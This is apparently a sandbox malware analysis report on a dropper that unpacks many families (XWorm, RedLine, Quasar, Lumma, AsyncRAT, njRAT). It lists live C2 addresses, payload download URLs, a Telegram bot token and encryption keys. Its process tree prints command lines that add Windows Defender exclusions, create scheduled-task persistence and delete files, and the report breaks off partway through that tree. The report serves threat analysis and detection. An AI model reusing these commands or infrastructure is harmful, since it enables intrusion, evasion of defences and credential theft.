Resubmissions

28-11-2024 02:19

241128-cr9sks1kht 10

27-11-2024 21:08

241127-zyzyaawqgn 10

27-11-2024 20:16

241127-y145caymbs 10

27-11-2024 20:13

241127-yzlxdavlen 10

27-11-2024 19:53

241127-yl61dsxpcs 10

27-11-2024 19:38

241127-ycrjcaxkfx 10

27-11-2024 19:03

241127-xqsswsslej 10

27-11-2024 19:03

241127-xqf44aslcr 3

27-11-2024 19:02

241127-xpxqfsslan 3

27-11-2024 18:32

241127-w6pkqs1mek 10

Analysis

  • max time kernel
    550s
  • max time network
    577s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    26-11-2024 19:24

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat

exe.dropper

http://unvdwl.com/un2/botprnt.dat

Extracted

Family

xworm

C2

91.92.240.41:7000

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    voldec.exe

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

217.195.195.46:1604

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

microsoftsys.ddns.net:4782

Mutex

67e0653d-eedf-4888-88ab-78e97eb2df27

Attributes
  • encryption_key

    23E5F6D22FEE1750D36544A759A48349B064BC34

  • install_name

    PerfWatson1.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svhost

  • subdirectory

    KDOT

Extracted

Family

lumma

C2

https://servicedny.site

https://authorisev.site

https://faulteyotk.site

https://dilemmadu.site

https://contemteny.site

https://goalyfeastz.site

https://opposezmny.site

https://seallysl.site

https://thighpecr.cyou

Extracted

Family

xworm

Version

5.0

C2

154.197.69.165:7000

62.113.117.95:5665

Mutex

wPxAiY3vITAPeZGc

Attributes
  • Install_directory

    %AppData%

  • install_file

    System.exe

aes.plain
aes.plain

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

C2

82.193.104.21:5137

Mutex

Windows Update

Attributes
  • reg_key

    Windows Update

  • splitter

    |Hassan|

Extracted

Family

quasar

Version

1.4.1

Botnet

Nigga

C2

yzs-42879.portmap.host:42879

Mutex

57d72303-b5e9-46aa-8cc4-9690809c1a9e

Attributes
  • encryption_key

    F1EBDB1862062F9265C0B5AC4D02C76D026534D0

  • install_name

    RuntimeBroker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    Temp

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessag

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • BabbleLoader

    BabbleLoader is a malware loader written in C++.

  • Babbleloader family
  • Detect Xworm Payload 7 IoCs
  • Detects BabbleLoader Payload 1 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Njrat family
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 34 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 58 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 29 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 2 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 55 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 28 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • NSIS installer 1 IoCs
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 28 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 26 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 29 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3572
      • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
        "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4692
        • C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:772
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3880
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:516
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3372
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svcsys'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3932
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svcsys'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4492
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svcsys" /tr "C:\ProgramData\svcsys"
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1916
        • C:\Users\Admin\AppData\Local\Temp\Files\7777.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\7777.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:1636
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3728
        • C:\Users\Admin\AppData\Local\Temp\Files\j86piuq9.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\j86piuq9.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:3652
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
              PID:5360
            • C:\Windows\Boot\PCAT\memtest.exe
              "C:\Windows\Boot\PCAT\memtest.exe"
              4⤵
                PID:4628
              • C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe
                "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe"
                4⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                PID:5276
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe" & rd /s /q "C:\ProgramData\JKJKJJDBKEGI" & exit
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2456
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 10
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:5292
            • C:\Users\Admin\AppData\Local\Temp\Files\legas.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1472
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4008
                • C:\Users\Admin\AppData\Roaming\sgGWFhcaHD.exe
                  "C:\Users\Admin\AppData\Roaming\sgGWFhcaHD.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:4616
                • C:\Users\Admin\AppData\Roaming\Njx11RiiEL.exe
                  "C:\Users\Admin\AppData\Roaming\Njx11RiiEL.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:3116
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 292
                4⤵
                • Program crash
                PID:1248
            • C:\Users\Admin\AppData\Local\Temp\Files\crypteda.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\crypteda.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1976
              • C:\Users\Admin\AppData\Roaming\FvPeQhIfo6.exe
                "C:\Users\Admin\AppData\Roaming\FvPeQhIfo6.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3420
              • C:\Users\Admin\AppData\Roaming\YpJU1SdRN0.exe
                "C:\Users\Admin\AppData\Roaming\YpJU1SdRN0.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:4220
            • C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4072
            • C:\Users\Admin\AppData\Local\Temp\Files\w.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\w.exe"
              3⤵
              • Executes dropped EXE
              PID:3960
            • C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
              3⤵
              • Executes dropped EXE
              PID:1284
              • C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:328
            • C:\Users\Admin\AppData\Local\Temp\Files\built.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\built.exe"
              3⤵
              • Executes dropped EXE
              PID:4832
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\built.exe" /rl HIGHEST /f
                4⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3344
              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:3412
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                  5⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3908
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1zEIBHtViAMV.bat" "
                  5⤵
                    PID:1112
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      6⤵
                        PID:2444
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        6⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:1740
                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                        6⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:4440
                        • C:\Windows\SYSTEM32\schtasks.exe
                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                          7⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:1676
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1OEpgI8cNZZp.bat" "
                          7⤵
                            PID:1668
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              8⤵
                                PID:4508
                              • C:\Windows\system32\PING.EXE
                                ping -n 10 localhost
                                8⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:3584
                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                8⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:2848
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                  9⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:5016
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dim1P73zFbfQ.bat" "
                                  9⤵
                                    PID:1748
                                    • C:\Windows\system32\chcp.com
                                      chcp 65001
                                      10⤵
                                        PID:1624
                                      • C:\Windows\system32\PING.EXE
                                        ping -n 10 localhost
                                        10⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:3416
                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                        10⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3924
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                          11⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3680
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1CFhkz8SxG0Q.bat" "
                                          11⤵
                                            PID:4656
                                            • C:\Windows\system32\chcp.com
                                              chcp 65001
                                              12⤵
                                                PID:1524
                                              • C:\Windows\system32\PING.EXE
                                                ping -n 10 localhost
                                                12⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Runs ping.exe
                                                PID:2440
                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                12⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4300
                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                  13⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:4868
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KSCE3JBRYd2w.bat" "
                                                  13⤵
                                                    PID:932
                                                    • C:\Windows\system32\chcp.com
                                                      chcp 65001
                                                      14⤵
                                                        PID:1976
                                                      • C:\Windows\system32\PING.EXE
                                                        ping -n 10 localhost
                                                        14⤵
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:4620
                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                        14⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2320
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                          15⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2432
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QDvzE7fy3V99.bat" "
                                                          15⤵
                                                            PID:2848
                                                            • C:\Windows\system32\chcp.com
                                                              chcp 65001
                                                              16⤵
                                                                PID:1492
                                                              • C:\Windows\system32\PING.EXE
                                                                ping -n 10 localhost
                                                                16⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:4280
                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                16⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2592
                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                  17⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3136
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qcG0B5fWM2Kp.bat" "
                                                                  17⤵
                                                                    PID:4604
                                                                    • C:\Windows\system32\chcp.com
                                                                      chcp 65001
                                                                      18⤵
                                                                        PID:4764
                                                                      • C:\Windows\system32\PING.EXE
                                                                        ping -n 10 localhost
                                                                        18⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Runs ping.exe
                                                                        PID:2492
                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                        18⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4828
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                          19⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1656
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZyT8xENVOTWD.bat" "
                                                                          19⤵
                                                                            PID:3924
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              20⤵
                                                                                PID:3728
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping -n 10 localhost
                                                                                20⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:3756
                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                20⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:2968
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                  21⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:3012
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7P5mQdWx91Hz.bat" "
                                                                                  21⤵
                                                                                    PID:4468
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
                                                                                      22⤵
                                                                                        PID:4612
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        22⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:1524
                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                        22⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:1716
                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                          "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                          23⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:3892
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RAkrmuQPQn9V.bat" "
                                                                                          23⤵
                                                                                            PID:4572
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp 65001
                                                                                              24⤵
                                                                                                PID:4740
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping -n 10 localhost
                                                                                                24⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:3676
                                                                                              • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                24⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:2188
                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                  "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
                                                                                                  25⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4624
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xMLPDGyJfkhk.bat" "
                                                                                                  25⤵
                                                                                                    PID:1848
                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                      chcp 65001
                                                                                                      26⤵
                                                                                                        PID:2520
                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                        ping -n 10 localhost
                                                                                                        26⤵
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        • Runs ping.exe
                                                                                                        PID:1948
                                                                                                      • C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
                                                                                                        26⤵
                                                                                                        • Checks computer location settings
